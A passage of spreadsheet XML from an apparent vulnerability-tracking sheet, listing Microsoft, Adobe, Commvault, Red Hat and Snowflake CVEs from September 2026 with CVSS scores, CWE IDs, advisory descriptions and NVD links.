in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t></is></c></row><row r="314"><c r="A314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C314" s="5" t="inlineStr"><is><t>CVE-2026-72961</t></is></c><c r="D314" s="5" t="n"><v>8.199999999999999</v></c><c r="E314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G314" s="5" t="inlineStr" /><c r="H314" s="5" t="n"><v>0.003</v></c><c r="I314" s="5" t="inlineStr" /><c r="J314" s="5" t="inlineStr" /><c r="K314" s="5" t="inlineStr" /><c r="L314" s="5" t="inlineStr" /><c r="M314" s="5" t="inlineStr" /><c r="N314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q314" s="5" t="inlineStr" /><c r="R314" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t></is></c></row><row r="315"><c r="A315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C315" s="5" t="inlineStr"><is><t>CVE-2026-72962</t></is></c><c r="D315" s="5" t="n"><v>8.199999999999999</v></c><c r="E315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G315" s="5" t="inlineStr" /><c r="H315" s="5" t="n"><v>0.003</v></c><c r="I315" s="5" t="inlineStr" /><c r="J315" s="5" t="inlineStr" /><c r="K315" s="5" t="inlineStr" /><c r="L315" s="5" t="inlineStr" /><c r="M315" s="5" t="inlineStr" /><c r="N315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q315" s="5" t="inlineStr" /><c r="R315" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S315" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t></is></c></row><row r="316"><c r="A316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C316" s="5" t="inlineStr"><is><t>CVE-2026-76191</t></is></c><c r="D316" s="5" t="n"><v>8.199999999999999</v></c><c r="E316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F316" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G316" s="5" t="inlineStr" /><c r="H316" s="5" t="n"><v>0.003</v></c><c r="I316" s="5" t="inlineStr" /><c r="J316" s="5" t="inlineStr" /><c r="K316" s="5" t="inlineStr"><is><t>adobe:animate, apple:macos, microsoft:windows</t></is></c><c r="L316" s="5" t="inlineStr" /><c r="M316" s="5" t="inlineStr" /><c r="N316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P316" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q316" s="5" t="inlineStr" /><c r="R316" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S316" s="5" t="inlineStr"><is><t>Animate is affected by an Improper Control of Generation of Code ('Code Injection')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is></c><c r="T316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t></is></c></row><row r="317"><c r="A317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C317" s="5" t="inlineStr"><is><t>CVE-2026-76202</t></is></c><c r="D317" s="5" t="n"><v>8.199999999999999</v></c><c r="E317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F317" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G317" s="5" t="inlineStr" /><c r="H317" s="5" t="n"><v>0.004</v></c><c r="I317" s="5" t="inlineStr" /><c r="J317" s="5" t="inlineStr" /><c r="K317" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L317" s="5" t="inlineStr" /><c r="M317" s="5" t="inlineStr" /><c r="N317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P317" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q317" s="5" t="inlineStr" /><c r="R317" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S317" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t></is></c><c r="T317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t></is></c></row><row r="318"><c r="A318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C318" s="5" t="inlineStr"><is><t>CVE-2026-77097</t></is></c><c r="D318" s="5" t="n"><v>8.199999999999999</v></c><c r="E318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G318" s="5" t="inlineStr" /><c r="H318" s="5" t="n"><v>0.003</v></c><c r="I318" s="5" t="inlineStr" /><c r="J318" s="5" t="inlineStr" /><c r="K318" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L318" s="5" t="inlineStr" /><c r="M318" s="5" t="inlineStr" /><c r="N318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q318" s="5" t="inlineStr" /><c r="R318" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S318" s="5" t="inlineStr"><is><t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t></is></c></row><row r="319"><c r="A319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C319" s="5" t="inlineStr"><is><t>CVE-2026-77968</t></is></c><c r="D319" s="5" t="n"><v>8.199999999999999</v></c><c r="E319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F319" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G319" s="5" t="inlineStr" /><c r="H319" s="5" t="n"><v>0.002</v></c><c r="I319" s="5" t="inlineStr" /><c r="J319" s="5" t="inlineStr" /><c r="K319" s="5" t="inlineStr" /><c r="L319" s="5" t="inlineStr" /><c r="M319" s="5" t="inlineStr" /><c r="N319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q319" s="5" t="inlineStr" /><c r="R319" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S319" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t></is></c><c r="T319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t></is></c></row><row r="320"><c r="A320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C320" s="5" t="inlineStr"><is><t>CVE-2026-81354</t></is></c><c r="D320" s="5" t="n"><v>8.199999999999999</v></c><c r="E320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F320" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G320" s="5" t="inlineStr" /><c r="H320" s="5" t="n"><v>0.002</v></c><c r="I320" s="5" t="inlineStr" /><c r="J320" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K320" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t></is></c><c r="L320" s="5" t="inlineStr" /><c r="M320" s="5" t="inlineStr" /><c r="N320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q320" s="5" t="inlineStr" /><c r="R320" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S320" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t></is></c></row><row r="321"><c r="A321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C321" s="5" t="inlineStr"><is><t>CVE-2026-81356</t></is></c><c r="D321" s="5" t="n"><v>8.199999999999999</v></c><c r="E321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F321" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G321" s="5" t="inlineStr" /><c r="H321" s="5" t="n"><v>0.003</v></c><c r="I321" s="5" t="inlineStr" /><c r="J321" s="5" t="inlineStr" /><c r="K321" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L321" s="5" t="inlineStr" /><c r="M321" s="5" t="inlineStr" /><c r="N321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q321" s="5" t="inlineStr" /><c r="R321" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S321" s="5" t="inlineStr"><is><t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t></is></c></row><row r="322"><c r="A322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C322" s="5" t="inlineStr"><is><t>CVE-2026-81357</t></is></c><c r="D322" s="5" t="n"><v>8.199999999999999</v></c><c r="E322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F322" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G322" s="5" t="inlineStr" /><c r="H322" s="5" t="n"><v>0.003</v></c><c r="I322" s="5" t="inlineStr" /><c r="J322" s="5" t="inlineStr" /><c r="K322" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L322" s="5" t="inlineStr" /><c r="M322" s="5" t="inlineStr" /><c r="N322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P322" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q322" s="5" t="inlineStr" /><c r="R322" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S322" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t></is></c></row><row r="323"><c r="A323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C323" s="5" t="inlineStr"><is><t>CVE-2026-81378</t></is></c><c r="D323" s="5" t="n"><v>8.199999999999999</v></c><c r="E323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F323" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G323" s="5" t="inlineStr" /><c r="H323" s="5" t="n"><v>0.003</v></c><c r="I323" s="5" t="inlineStr" /><c r="J323" s="5" t="inlineStr" /><c r="K323" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L323" s="5" t="inlineStr" /><c r="M323" s="5" t="inlineStr" /><c r="N323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P323" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q323" s="5" t="inlineStr" /><c r="R323" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S323" s="5" t="inlineStr"><is><t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t></is></c></row><row r="324"><c r="A324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C324" s="5" t="inlineStr"><is><t>CVE-2026-81379</t></is></c><c r="D324" s="5" t="n"><v>8.199999999999999</v></c><c r="E324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F324" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G324" s="5" t="inlineStr" /><c r="H324" s="5" t="n"><v>0.003</v></c><c r="I324" s="5" t="inlineStr" /><c r="J324" s="5" t="inlineStr" /><c r="K324" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L324" s="5" t="inlineStr" /><c r="M324" s="5" t="inlineStr" /><c r="N324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q324" s="5" t="inlineStr" /><c r="R324" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="S324" s="5" t="inlineStr"><is><t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t></is></c></row><row r="325"><c r="A325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C325" s="5" t="inlineStr"><is><t>CVE-2026-83939</t></is></c><c r="D325" s="5" t="n"><v>8.199999999999999</v></c><c r="E325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G325" s="5" t="inlineStr" /><c r="H325" s="5" t="n"><v>0.003</v></c><c r="I325" s="5" t="inlineStr" /><c r="J325" s="5" t="inlineStr" /><c r="K325" s="5" t="inlineStr"><is><t>microsoft:windows_11_26h1</t></is></c><c r="L325" s="5" t="inlineStr" /><c r="M325" s="5" t="inlineStr" /><c r="N325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q325" s="5" t="inlineStr" /><c r="R325" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S325" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t></is></c></row><row r="326"><c r="A326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C326" s="5" t="inlineStr"><is><t>CVE-2026-86600</t></is></c><c r="D326" s="5" t="n"><v>8.199999999999999</v></c><c r="E326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F326" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G326" s="5" t="inlineStr" /><c r="H326" s="5" t="n"><v>0.003</v></c><c r="I326" s="5" t="inlineStr" /><c r="J326" s="5" t="inlineStr" /><c r="K326" s="5" t="inlineStr" /><c r="L326" s="5" t="inlineStr" /><c r="M326" s="5" t="inlineStr" /><c r="N326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q326" s="5" t="inlineStr" /><c r="R326" s="5" t="inlineStr"><is><t>CWE-441, CWE-522</t></is></c><c r="S326" s="5" t="inlineStr"><is><t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t></is></c><c r="T326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t></is></c></row><row r="327"><c r="A327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C327" s="5" t="inlineStr"><is><t>CVE-2026-47297</t></is></c><c r="D327" s="5" t="n"><v>8.1</v></c><c r="E327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G327" s="5" t="inlineStr" /><c r="H327" s="5" t="n"><v>0.008</v></c><c r="I327" s="5" t="inlineStr" /><c r="J327" s="5" t="inlineStr" /><c r="K327" s="5" t="inlineStr" /><c r="L327" s="5" t="inlineStr" /><c r="M327" s="5" t="inlineStr" /><c r="N327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P327" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q327" s="5" t="inlineStr" /><c r="R327" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S327" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t></is></c></row><row r="328"><c r="A328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C328" s="5" t="inlineStr"><is><t>CVE-2026-55007</t></is></c><c r="D328" s="5" t="n"><v>8.1</v></c><c r="E328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G328" s="5" t="inlineStr" /><c r="H328" s="5" t="n"><v>0.007</v></c><c r="I328" s="5" t="inlineStr" /><c r="J328" s="5" t="inlineStr" /><c r="K328" s="5" t="inlineStr" /><c r="L328" s="5" t="inlineStr" /><c r="M328" s="5" t="inlineStr" /><c r="N328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q328" s="5" t="inlineStr" /><c r="R328" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S328" s="5" t="inlineStr"><is><t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t></is></c></row><row r="329"><c r="A329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C329" s="5" t="inlineStr"><is><t>CVE-2026-69325</t></is></c><c r="D329" s="5" t="n"><v>8.1</v></c><c r="E329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G329" s="5" t="inlineStr" /><c r="H329" s="5" t="n"><v>0.006</v></c><c r="I329" s="5" t="inlineStr" /><c r="J329" s="5" t="inlineStr" /><c r="K329" s="5" t="inlineStr" /><c r="L329" s="5" t="inlineStr" /><c r="M329" s="5" t="inlineStr" /><c r="N329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q329" s="5" t="inlineStr" /><c r="R329" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S329" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t></is></c></row><row r="330"><c r="A330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C330" s="5" t="inlineStr"><is><t>CVE-2026-69380</t></is></c><c r="D330" s="5" t="n"><v>8.1</v></c><c r="E330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G330" s="5" t="inlineStr" /><c r="H330" s="5" t="n"><v>0.007</v></c><c r="I330" s="5" t="inlineStr" /><c r="J330" s="5" t="inlineStr" /><c r="K330" s="5" t="inlineStr" /><c r="L330" s="5" t="inlineStr" /><c r="M330" s="5" t="inlineStr" /><c r="N330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P330" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q330" s="5" t="inlineStr" /><c r="R330" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S330" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t></is></c></row><row r="331"><c r="A331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C331" s="5" t="inlineStr"><is><t>CVE-2026-69438</t></is></c><c r="D331" s="5" t="n"><v>8.1</v></c><c r="E331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F331" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G331" s="5" t="inlineStr" /><c r="H331" s="5" t="n"><v>0.007</v></c><c r="I331" s="5" t="inlineStr" /><c r="J331" s="5" t="inlineStr" /><c r="K331" s="5" t="inlineStr" /><c r="L331" s="5" t="inlineStr" /><c r="M331" s="5" t="inlineStr" /><c r="N331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P331" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q331" s="5" t="inlineStr" /><c r="R331" s="5" t="inlineStr"><is><t>CWE-681</t></is></c><c r="S331" s="5" t="inlineStr"><is><t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t></is></c></row><row r="332"><c r="A332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C332" s="5" t="inlineStr"><is><t>CVE-2026-69510</t></is></c><c r="D332" s="5" t="n"><v>8.1</v></c><c r="E332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F332" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G332" s="5" t="inlineStr" /><c r="H332" s="5" t="n"><v>0.007</v></c><c r="I332" s="5" t="inlineStr" /><c r="J332" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K332" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L332" s="5" t="inlineStr" /><c r="M332" s="5" t="inlineStr" /><c r="N332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P332" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q332" s="5" t="inlineStr" /><c r="R332" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S332" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t></is></c></row><row r="333"><c r="A333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C333" s="5" t="inlineStr"><is><t>CVE-2026-69524</t></is></c><c r="D333" s="5" t="n"><v>8.1</v></c><c r="E333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F333" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G333" s="5" t="inlineStr" /><c r="H333" s="5" t="n"><v>0.007</v></c><c r="I333" s="5" t="inlineStr" /><c r="J333" s="5" t="inlineStr" /><c r="K333" s="5" t="inlineStr" /><c r="L333" s="5" t="inlineStr" /><c r="M333" s="5" t="inlineStr" /><c r="N333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P333" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q333" s="5" t="inlineStr" /><c r="R333" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S333" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t></is></c></row><row r="334"><c r="A334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C334" s="5" t="inlineStr"><is><t>CVE-2026-69530</t></is></c><c r="D334" s="5" t="n"><v>8.1</v></c><c r="E334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F334" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G334" s="5" t="inlineStr" /><c r="H334" s="5" t="n"><v>0.006</v></c><c r="I334" s="5" t="inlineStr" /><c r="J334" s="5" t="inlineStr" /><c r="K334" s="5" t="inlineStr" /><c r="L334" s="5" t="inlineStr" /><c r="M334" s="5" t="inlineStr" /><c r="N334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P334" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q334" s="5" t="inlineStr" /><c r="R334" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S334" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t></is></c></row><row r="335"><c r="A335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C335" s="5" t="inlineStr"><is><t>CVE-2026-69546</t></is></c><c r="D335" s="5" t="n"><v>8.1</v></c><c r="E335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F335" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G335" s="5" t="inlineStr" /><c r="H335" s="5" t="n"><v>0.007</v></c><c r="I335" s="5" t="inlineStr" /><c r="J335" s="5" 